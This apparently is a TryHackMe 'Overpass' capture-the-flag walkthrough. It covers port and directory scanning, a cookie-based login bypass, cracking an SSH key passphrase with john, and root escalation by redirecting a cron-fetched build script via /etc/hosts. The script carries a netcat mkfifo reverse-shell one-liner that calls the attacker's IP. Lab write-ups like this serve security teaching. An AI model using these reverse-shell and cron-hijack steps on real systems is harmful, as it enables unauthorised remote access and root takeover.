Overpass

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.48.148

Detailed Nmap Scan :

Command Breakdown:

(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 22,80
(-oN nmap): Saving it into a files called nmap

nmap -sV -sC -p 21,22,80 -oN nmap 10.10.48.148

Enumeration

Lets visit the website

There is nothing of interest as of now, so lets run gobusterto find hidden directories.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.48.148/

We find an admin page, lets visit it.

Its a login page, after looking through the different files in the source code of the page, I found a interesting file called login.js, and the interesting part is the function called login

async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    loginStatus.textContent = ""
    const creds = { username: usernameBox.value, password: passwordBox.value }
    const response = await postData("/api/login", creds)
    const statusOrCookie = await response.text()
    if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials"
        passwordBox.value=""
    } else {
        Cookies.set("SessionToken",statusOrCookie)
        window.location = "/admin"
    }

Looking at the if statement, so if we login with incorrect credentials, the response we get is Incorrect credentials, but on the other hand if we get the right credentials, it sets the SessionToken cookie to the value statusOrCookie and points us to the /admin page.

So lets go to the Console (Ctrl + Shift + i) of the web page and type this in the console.

Once you click enter and reload the page, you are logged in.

You are given a RSA Private key, so we can copy this, crack the password using john the ripper and then login with ssh. I copied the RSA private key and stored it in a file called id_rsa

Now we need a password to login with ssh, so lets crack it with ssh2john.

/usr/share/john/ssh2john.py id_rsa > id_rsa_hash

Now lets crack the hash with johntheripper

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash

We found the password which is james13.

Now to login with this information we need to first give permissions to the id_rsa file.

chmod 600 id_rsa

And now we can use this command to login through ssh, I think the username is going to be james as the password has the word james in it.

ssh -i id_rsa james@10.10.48.148

We can now read the user.txt

Privilege Escalation

We cannot run the command sudo -l to see what we can run as root as we don't have the password for james.

In the directory we are in, we see a file called todo.txt so lets read the file

From this we can say that

There is a password somewhere in the password manager they made
The encryption for the password is weak
There is a automated build script running.

There is also another interesting file in this directory, which is called .overpass

Lets read the file

Its looks like some type of code that has been modified, so lets go to CyberChef and see what it says. I went though different recipes and found the correct one which is ROT47.

I looked for way to use this information to privilege escalate to root, but it did not help in any way, so we need to find another way.

Looking back at the todo.txt file, we saw that there was an automated build script running, lets check that.

cat /etc/crontab

Looking at the last line, we can see that the cronjob fetches the buildscriptfile from the website and pipes it to bash. To exploit this we need to redirect the domain to our IP address. We can do that by adding our Try Hack Me IP to the /etc/hosts on this machine. We need to replace the IP of overpass.thm with our IP.

Now we need to create a similar directory structure as the one in the victim machine so that the exploit can work properly, so lets create the directory download/src

mkdir -p downloads/src

Now we should create a file called buildscript.sh and add a reverse shell to it as then we can get a reverse shell while is runs every few minutes because it is a cronjob.

We can find the reverse shell here.

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f' > buildscript.sh

And now we have to start a http server using python (make sure you are two directories behind which means that you can cd into /downloads/src) so that the victim machine can connect to our machine and also start a netcat listener to listen on the reverse shell.